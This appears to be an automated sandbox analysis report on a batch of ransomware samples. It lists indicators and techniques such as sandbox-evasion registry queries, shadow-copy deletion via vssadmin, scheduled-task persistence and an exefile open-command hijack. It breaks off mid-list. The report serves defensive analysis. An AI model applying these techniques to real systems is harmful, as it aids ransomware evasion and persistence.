Trojan-Ransom.Win32.Foreign.oftl-85a577c129c5ee7b40f871113fe6f7886d12bfa6d82f6b343cb0ec5d077dccf6.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2896 PING.EXE -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe -
Checks processor information in registry 2 TTPs 13 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ditziw.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ditziw.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz ditziw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz ditziw.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 7776 timeout.exe 7252 timeout.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier Trojan-Ransom.Win32.Locky.adiq-a11caa15d682952f356c75249b803496c532ec358094b97e7daee6a17a4210e8.exe -
Interacts with shadow copies 3 TTPs 4 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 8468 vssadmin.exe 2224 vssadmin.exe 6216 vssadmin.exe 6236 vssadmin.exe -
Modifies registry class 52 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" taskmgr.exe Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 taskmgr.exe Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff taskmgr.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 taskmgr.exe Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" taskmgr.exe Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" taskmgr.exe Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 3a002e803accbfb42cdb4c42b0297fe99a87c641260001002600efbe1100000022ad5a689918db0164f06a6e8928db0164f06a6e8928db0114000000 taskmgr.exe Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" taskmgr.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU taskmgr.exe Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 taskmgr.exe Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 = 56003100000000005b594980100057696e646f777300400009000400efbe874f77485b5949802e000000000600000000010000000000000000000000000000009f4b1b01570069006e0064006f0077007300000016000000 taskmgr.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 taskmgr.exe Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\MRUListEx = 00000000ffffffff taskmgr.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ taskmgr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Instance\ taskmgr.exe Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 taskmgr.exe Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 taskmgr.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 taskmgr.exe Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff taskmgr.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3 taskmgr.exe Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" taskmgr.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings taskmgr.exe Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 taskmgr.exe Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 taskmgr.exe Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\NodeSlot = "2" taskmgr.exe Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\MRUListEx = ffffffff taskmgr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A8CDFF1C-4878-43be-B5FD-F8091C1C60D0}\Instance\ taskmgr.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg taskmgr.exe Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" taskmgr.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic" taskmgr.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell taskmgr.exe Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = 00000000ffffffff taskmgr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ taskmgr.exe Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "3" taskmgr.exe Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff taskmgr.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 taskmgr.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} taskmgr.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" taskmgr.exe Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" taskmgr.exe Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 19002f433a5c000000000000000000000000000000000000000000 taskmgr.exe Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff taskmgr.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 taskmgr.exe Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 = 5a003100000000005b592080100053797374656d33320000420009000400efbe874f77485b5920802e000000b90c0000000001000000000000000000000000000000ae6f6100530079007300740065006d0033003200000018000000 taskmgr.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell taskmgr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" HEUR-Trojan-Ransom.MSIL.njLime.gen-17fdc8576a2bfc5aaca1ca1094c3e3f46a304074d7d1bfe68776a33b460e9e57.exe Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" taskmgr.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell taskmgr.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff taskmgr.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 taskmgr.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags taskmgr.exe Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" taskmgr.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 5176 reg.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2896 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2812 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 2368 powershell.exe 2368 powershell.exe 2368 powershell.exe 3064 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 428 7zFM.exe 3064 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 29 IoCs
description pid Process Token: SeRestorePrivilege 428 7zFM.exe Token: 35 428 7zFM.exe Token: SeSecurityPrivilege 428 7zFM.exe Token: SeDebugPrivilege 4376 taskmgr.exe Token: SeSystemProfilePrivilege 4376 taskmgr.exe Token: SeCreateGlobalPrivilege 4376 taskmgr.exe Token: SeDebugPrivilege 3064 taskmgr.exe Token: SeSystemProfilePrivilege 3064 taskmgr.exe Token: SeCreateGlobalPrivilege 3064 taskmgr.exe Token: 33 4376 taskmgr.exe Token: SeIncBasePriorityPrivilege 4376 taskmgr.exe Token: SeDebugPrivilege 2368 powershell.exe Token: SeDebugPrivilege 2156 HEUR-Trojan-Ransom.MSIL.Makop.gen-0ed05e4be5376f0cf391a78afc7a3114ffbfa064348fb66cd93e8ee6f6b27fe1.exe Token: SeDebugPrivilege 2184 HEUR-Trojan-Ransom.MSIL.Gen.gen-886ed9d1806668c086ece3c4d433b9daced419d2fc8645d3c5db28a7b7878cd0.exe Token: SeDebugPrivilege 4780 svchost.exe Token: SeDebugPrivilege 4780 svchost.exe Token: SeDebugPrivilege 4780 svchost.exe Token: SeDebugPrivilege 2432 Trojan-Ransom.Win32.Foreign.olpr-302fecaf77de168224abccd8a610dda5699e0d16ea5fa4577de83fad2f22433a.exe Token: SeDebugPrivilege 6044 AVShieldPro.exe Token: SeDebugPrivilege 1088 HEUR-Trojan-Ransom.MSIL.njLime.gen-17fdc8576a2bfc5aaca1ca1094c3e3f46a304074d7d1bfe68776a33b460e9e57.exe Token: SeDebugPrivilege 5656 VHO-Trojan-Ransom.Win32.Blocker.gen-296a2e629991f1fa388bda5e674dd6471e8f84787137fb17a7567d143ea24376.exe Token: SeBackupPrivilege 8212 vssvc.exe Token: SeRestorePrivilege 8212 vssvc.exe Token: SeAuditPrivilege 8212 vssvc.exe Token: SeBackupPrivilege 5276 vbc.exe Token: SeRestorePrivilege 5276 vbc.exe Token: SeBackupPrivilege 5148 vbc.exe Token: SeRestorePrivilege 5148 vbc.exe Token: SeDebugPrivilege 8584 Powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 428 7zFM.exe 428 7zFM.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe -
Suspicious use of SetWindowsHookEx 22 IoCs
pid Process 2520 HEUR-Trojan-Ransom.Win32.KlopRansom.gen-ed3dfa9f2452537d378ead320e1506d392d3f91557d8c52714dfd6024176cf73.exe 2520 HEUR-Trojan-Ransom.Win32.KlopRansom.gen-ed3dfa9f2452537d378ead320e1506d392d3f91557d8c52714dfd6024176cf73.exe 2184 HEUR-Trojan-Ransom.MSIL.Gen.gen-886ed9d1806668c086ece3c4d433b9daced419d2fc8645d3c5db28a7b7878cd0.exe 2184 HEUR-Trojan-Ransom.MSIL.Gen.gen-886ed9d1806668c086ece3c4d433b9daced419d2fc8645d3c5db28a7b7878cd0.exe 1616 mspaint.exe 1616 mspaint.exe 1616 mspaint.exe 1616 mspaint.exe 1616 mspaint.exe 5656 VHO-Trojan-Ransom.Win32.Blocker.gen-296a2e629991f1fa388bda5e674dd6471e8f84787137fb17a7567d143ea24376.exe 3064 taskmgr.exe 6764 VHO-Trojan-Ransom.Win32.Convagent.gen-ceb44492510d44d5bc712a41e1f4da9f5e222647b7a0f9a55db5c8cfcf024f59.exe 6764 VHO-Trojan-Ransom.Win32.Convagent.gen-ceb44492510d44d5bc712a41e1f4da9f5e222647b7a0f9a55db5c8cfcf024f59.exe 7120 key6.exe 8248 UDS-Trojan-Ransom.Win32.PornoAsset.gen-bd78f4c233a67d83272ea92de4c5afff1a73dfea2abbb4489e54f0f5cfb6d9ac.exe 8248 UDS-Trojan-Ransom.Win32.PornoAsset.gen-bd78f4c233a67d83272ea92de4c5afff1a73dfea2abbb4489e54f0f5cfb6d9ac.exe 8248 UDS-Trojan-Ransom.Win32.PornoAsset.gen-bd78f4c233a67d83272ea92de4c5afff1a73dfea2abbb4489e54f0f5cfb6d9ac.exe 8248 UDS-Trojan-Ransom.Win32.PornoAsset.gen-bd78f4c233a67d83272ea92de4c5afff1a73dfea2abbb4489e54f0f5cfb6d9ac.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4376 wrote to memory of 3064 4376 taskmgr.exe 98 PID 4376 wrote to memory of 3064 4376 taskmgr.exe 98 PID 2368 wrote to memory of 2504 2368 powershell.exe 104 PID 2368 wrote to memory of 2504 2368 powershell.exe 104 PID 2504 wrote to memory of 1712 2504 cmd.exe 105 PID 2504 wrote to memory of 1712 2504 cmd.exe 105 PID 2504 wrote to memory of 2184 2504 cmd.exe 106 PID 2504 wrote to memory of 2184 2504 cmd.exe 106 PID 2504 wrote to memory of 2156 2504 cmd.exe 107 PID 2504 wrote to memory of 2156 2504 cmd.exe 107 PID 2504 wrote to memory of 2156 2504 cmd.exe 107 PID 2504 wrote to memory of 1088 2504 cmd.exe 110 PID 2504 wrote to memory of 1088 2504 cmd.exe 110 PID 2504 wrote to memory of 1088 2504 cmd.exe 110 PID 2504 wrote to memory of 1484 2504 cmd.exe 112 PID 2504 wrote to memory of 1484 2504 cmd.exe 112 PID 2504 wrote to memory of 1484 2504 cmd.exe 112 PID 2504 wrote to memory of 1080 2504 cmd.exe 157 PID 2504 wrote to memory of 1080 2504 cmd.exe 157 PID 2504 wrote to memory of 1080 2504 cmd.exe 157 PID 2504 wrote to memory of 2520 2504 cmd.exe 114 PID 2504 wrote to memory of 2520 2504 cmd.exe 114 PID 2504 wrote to memory of 2520 2504 cmd.exe 114 PID 2504 wrote to memory of 3428 2504 cmd.exe 115 PID 2504 wrote to memory of 3428 2504 cmd.exe 115 PID 2504 wrote to memory of 3428 2504 cmd.exe 115 PID 2504 wrote to memory of 440 2504 cmd.exe 117 PID 2504 wrote to memory of 440 2504 cmd.exe 117 PID 2504 wrote to memory of 440 2504 cmd.exe 117 PID 2504 wrote to memory of 1064 2504 cmd.exe 118 PID 2504 wrote to memory of 1064 2504 cmd.exe 118 PID 2504 wrote to memory of 1064 2504 cmd.exe 118 PID 3428 wrote to memory of 3200 3428 Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe 140 PID 3428 wrote to memory of 3200 3428 Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe 140 PID 3428 wrote to memory of 3200 3428 Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe 140 PID 440 wrote to memory of 4972 440 Trojan-Ransom.Win32.Blocker.jklq-af2d6cbb88ec14080026c0c0ee24a28c4c90e8ea5979440ef85f4f007a730e7a.exe 122 PID 440 wrote to memory of 4972 440 Trojan-Ransom.Win32.Blocker.jklq-af2d6cbb88ec14080026c0c0ee24a28c4c90e8ea5979440ef85f4f007a730e7a.exe 122 PID 440 wrote to memory of 4972 440 Trojan-Ransom.Win32.Blocker.jklq-af2d6cbb88ec14080026c0c0ee24a28c4c90e8ea5979440ef85f4f007a730e7a.exe 122 PID 440 wrote to memory of 4972 440 Trojan-Ransom.Win32.Blocker.jklq-af2d6cbb88ec14080026c0c0ee24a28c4c90e8ea5979440ef85f4f007a730e7a.exe 122 PID 440 wrote to memory of 4972 440 Trojan-Ransom.Win32.Blocker.jklq-af2d6cbb88ec14080026c0c0ee24a28c4c90e8ea5979440ef85f4f007a730e7a.exe 122 PID 1064 wrote to memory of 4248 1064 Trojan-Ransom.Win32.Blocker.lvzt-9bc75c69ead3c8ae7297911c3603cecc3f3d3c739cd5ebb60b111af1939c6952.exe 123 PID 1064 wrote to memory of 4248 1064 Trojan-Ransom.Win32.Blocker.lvzt-9bc75c69ead3c8ae7297911c3603cecc3f3d3c739cd5ebb60b111af1939c6952.exe 123 PID 1064 wrote to memory of 4248 1064 Trojan-Ransom.Win32.Blocker.lvzt-9bc75c69ead3c8ae7297911c3603cecc3f3d3c739cd5ebb60b111af1939c6952.exe 123 PID 1064 wrote to memory of 3596 1064 Trojan-Ransom.Win32.Blocker.lvzt-9bc75c69ead3c8ae7297911c3603cecc3f3d3c739cd5ebb60b111af1939c6952.exe 124 PID 1064 wrote to memory of 3596 1064 Trojan-Ransom.Win32.Blocker.lvzt-9bc75c69ead3c8ae7297911c3603cecc3f3d3c739cd5ebb60b111af1939c6952.exe 124 PID 1064 wrote to memory of 3596 1064 